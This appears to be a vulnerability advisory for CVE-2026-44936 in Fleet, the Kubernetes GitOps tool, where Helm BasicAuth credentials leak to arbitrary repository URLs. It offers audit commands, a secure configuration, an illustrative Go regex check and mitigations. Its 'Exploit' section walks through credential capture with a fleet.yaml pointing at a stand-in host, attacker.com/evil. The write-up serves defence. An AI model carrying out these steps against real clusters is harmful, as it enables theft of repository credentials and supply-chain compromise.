How CVE-2026-44936 Works
Fleet is a GitOps continuous delivery tool for Kubernetes clusters. It watches Git repositories for changes and deploys Helm charts or Kubernetes manifests to downstream clusters. To fetch private Helm charts, Fleet supports authentication via a `helmSecretName` field in a `GitRepo` resource, which references a Kubernetes Secret containing BasicAuth credentials (username and password) for a private Helm repository.
The vulnerability arises when the `helmRepoURLRegex` field is not set on a `GitRepo` resource. In such a configuration, Fleet’s bundle reader forwards the configured Helm BasicAuth credentials to any URL specified in the `helm.repo` field of a `fleet.yaml` file contained in the monitored Git repository.
An attacker with `git push` access to a Fleet-monitored repository can exploit this by modifying the `fleet.yaml` file to set `helm.repo` to a malicious URL under their control (e.g., `https://attacker.com/evil`). When Fleet's controller processes the `GitRepo`, it reads the `fleet.yaml`, extracts the `helm.repo` URL, and, because no `helmRepoURLRegex` is present to restrict which origins are allowed, sends the configured BasicAuth credentials to the attacker-specified URL.
The attacker's server receives the credentials (username and password) that the administrator configured to access the private Helm chart repository. This allows the attacker to capture these credentials and potentially use them to authenticate against the legitimate Helm repository or other services if the credentials are reused.
However, in versions after Fleet v0.13.3, the response body from the attacker's server is not included in the error message returned by Fleet. This prevents additional internal data (such as cluster metadata or other secrets) from being leaked through the status condition, limiting the exposure to just the credentials themselves.
The final severity of this vulnerability is not fixed—it depends entirely on the permissions associated with the leaked credentials. If the credentials grant read‑only access to a single Helm chart repository, the impact is limited. If they grant write access or are reused across multiple systems, the impact can be critical.
DailyCVE Form
Platform: Fleet
Version: <0.12.15, <0.13.11, <0.14.6, <0.15.2
Vulnerability: Helm credential leakage
Severity: Depends on leaked credentials
Date: 2026-05-28
Prediction: Patched versions already released
What Undercode Say
Audit Auto-Migrated GitRepo Resources
After upgrading to a patched version, review all `GitRepo` resources that were automatically migrated by the Helm pre‑upgrade job. The migration job adds the annotation `fleet.cattle.io/helm-regex-auto-migrated: "true"` to resources that had `helmSecretName` or `helmSecretNameForPaths` configured but lacked a.
Run the following command to list all such resources along with their auto‑derived regular expression:
```bash
kubectl get gitrepo -A -o json | \
  jq -r '.items[] | select(.metadata.annotations["fleet.cattle.io/helm-regex-auto-migrated"] == "true") | "\(.metadata.namespace)/\(.metadata.name): \(.spec.helmRepoURLRegex)"'
```
Verify the Auto-Derived Regex
The migration job extracts the scheme and host from the Helm repository URLs already stored in the resource's Bundles. For example, a `GitRepo` with Bundles referencing `https://charts.example.com/stable` receives `helmRepoURLRegex: "^https://charts\.example\.com/"`.
If the auto‑derived regular expression is broader than necessary (e.g., it matches unintended subdomains), replace it with a more specific pattern.
Example Secure Configuration
```yaml
apiVersion: fleet.cattle.io/v1alpha1
kind: GitRepo
metadata:
  name: my-app
  namespace: fleet-local
spec:
  repo: https://git.example.com/org/my-app.git
  helmSecretName: helm-creds
  helmRepoURLRegex: "^https://charts\\.example\\.com/."
```
This ensures credentials are only forwarded to URLs matching the specified regular expression.
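To make the regex check concrete, the following added example (constructed for this page, not Fleet's own code) re-implements the scheme-and-host derivation the migration job is described as performing and the patched fail-closed forwarding rule, so an auditor can test a `helmRepoURLRegex` against candidate `helm.repo` values, including a constructed lookalike host that an over-broad pattern (one without the trailing slash) would wrongly accept.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"regexp"
)

// DeriveHelmRepoURLRegex re-implements, for illustration only, the derivation
// the page attributes to the migration job: keep scheme and host of a Helm
// repository URL and anchor a regex on them. Constructed code, not Fleet's.
func DeriveHelmRepoURLRegex(repoURL string) (string, error) {
	u, err := url.Parse(repoURL)
	if err != nil {
		return "", err
	}
	if u.Scheme == "" || u.Host == "" {
		return "", fmt.Errorf("url %q lacks a scheme or host", repoURL)
	}
	// QuoteMeta escapes the dots so "charts.example.com" cannot match
	// "chartsXexample.com"; the trailing "/" stops lookalike hosts such as
	// "charts.example.com.lookalike.example" from matching.
	return "^" + regexp.QuoteMeta(u.Scheme+"://"+u.Host) + "/", nil
}

// ShouldForwardCredentials models the patched rule the page describes: with
// helmRepoURLRegex unset, BasicAuth credentials are never forwarded (the
// vulnerable versions forwarded them to any helm.repo URL in that case).
func ShouldForwardCredentials(helmRepoURLRegex, helmRepo string) (bool, error) {
	if helmRepoURLRegex == "" {
		return false, errors.New("helmRepoURLRegex unset: refusing to forward credentials")
	}
	re, err := regexp.Compile(helmRepoURLRegex)
	if err != nil {
		return false, fmt.Errorf("invalid helmRepoURLRegex: %w", err)
	}
	return re.MatchString(helmRepo), nil
}

func main() {
	re, err := DeriveHelmRepoURLRegex("https://charts.example.com/stable")
	if err != nil {
		panic(err)
	}
	fmt.Println("derived regex:", re)
	// Constructed helm.repo values an audit would check against the regex.
	for _, target := range []string{
		"https://charts.example.com/stable",
		"https://charts.example.com.lookalike.example/evil", // constructed lookalike
	} {
		ok, err := ShouldForwardCredentials(re, target)
		fmt.Printf("%-52s forward=%t err=%v\n", target, ok, err)
	}
}
```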
Check Migration Status
The migration job runs only once per installation and records its status in a ConfigMap named `fleet-helm-url-regex-migrated` in the Fleet system namespace. Inspect it with:
```bash
kubectl get configmap fleet-helm-url-regex-migrated -n fleet-system -o yaml
```
Exploit
- Gain Git Push Access – The attacker must have write access to a Git repository that Fleet monitors (e.g., through compromised credentials or an insider threat).
- Modify `fleet.yaml` – In the repository, edit the `fleet.yaml` file (or create one if it doesn't exist) and set the `helm.repo` field to a malicious URL under the attacker's control:

```yaml
helm:
  repo: https://attacker.com/evil
  chart: my-chart
  version: 1.0.0
```

- Wait for Fleet Sync – Fleet's controller periodically syncs the `GitRepo` resource. When it processes the updated `fleet.yaml`, it reads the `helm.repo` URL.
- Credential Exfiltration – Because no `helmRepoURLRegex` is set on the `GitRepo`, Fleet forwards the BasicAuth credentials (from the Secret referenced by `helmSecretName`) to the attacker's URL (`https://attacker.com/evil`).
- Capture Credentials – The attacker's server receives the HTTP request containing the `Authorization: Basic` header, decodes it, and obtains the plaintext username and password.
- Lateral Movement – The attacker can now use the captured credentials to authenticate against the legitimate Helm repository (or any other service where the credentials are reused), potentially accessing or modifying private Helm charts.
Protection
– Upgrade to a Patched Version – The most effective mitigation is to upgrade Fleet to one of the patched releases: v0.15.2, v0.14.6, v0.13.11, or v0.12.15. These versions require `helmRepoURLRegex` to be explicitly set before any credentials are forwarded.
– Set `helmRepoURLRegex` Manually – If you cannot upgrade immediately, manually add the `helmRepoURLRegex` field to all `GitRepo` resources that use `helmSecretName` or `helmSecretNameForPaths`. Ensure the regular expression matches only your legitimate Helm repository origin(s).
– Audit Existing Resources – After upgrading, run the `kubectl` command provided in the “What Undercode Say” section to identify all auto‑migrated resources. Verify that each auto‑derived regex is sufficiently restrictive.
– Rotate Compromised Credentials – If you suspect that credentials may have been leaked (e.g., you cannot rule out prior exploitation), immediately rotate the affected Helm repository credentials and any other credentials that may have been reused.
– Monitor Fleet Logs – Check Fleet controller logs for unexpected outbound requests to unknown URLs, which could indicate attempted exploitation.
Impact
- Credential Theft – An attacker with `git push` access can capture the BasicAuth credentials (username and password) configured for accessing private Helm chart repositories.
- Scope Depends on Permissions – The actual impact is not fixed; it scales with the permissions of the leaked credentials. If the credentials grant read‑only access to a single repository, the damage is limited. If they grant write access or are reused across multiple systems (e.g., for container registries, CI/CD pipelines, or cloud APIs), the attacker can escalate privileges, modify charts, inject malicious code, or pivot to other environments.
- Data Exfiltration – While the response body from the attacker’s server is not included in error messages (fixed in v0.13.3 and later), the credentials themselves are still transmitted in plaintext (over HTTPS) to the attacker’s endpoint, enabling exfiltration.
- Supply Chain Risk – Compromised Helm chart credentials can lead to the injection of malicious charts into private repositories, affecting all downstream clusters that consume those charts.
- Compliance and Audit – Organizations subject to regulations (e.g., GDPR, HIPAA) may face compliance violations if credentials are leaked, especially if they grant access to sensitive data or production environments.
Sources:
Reported By: github.com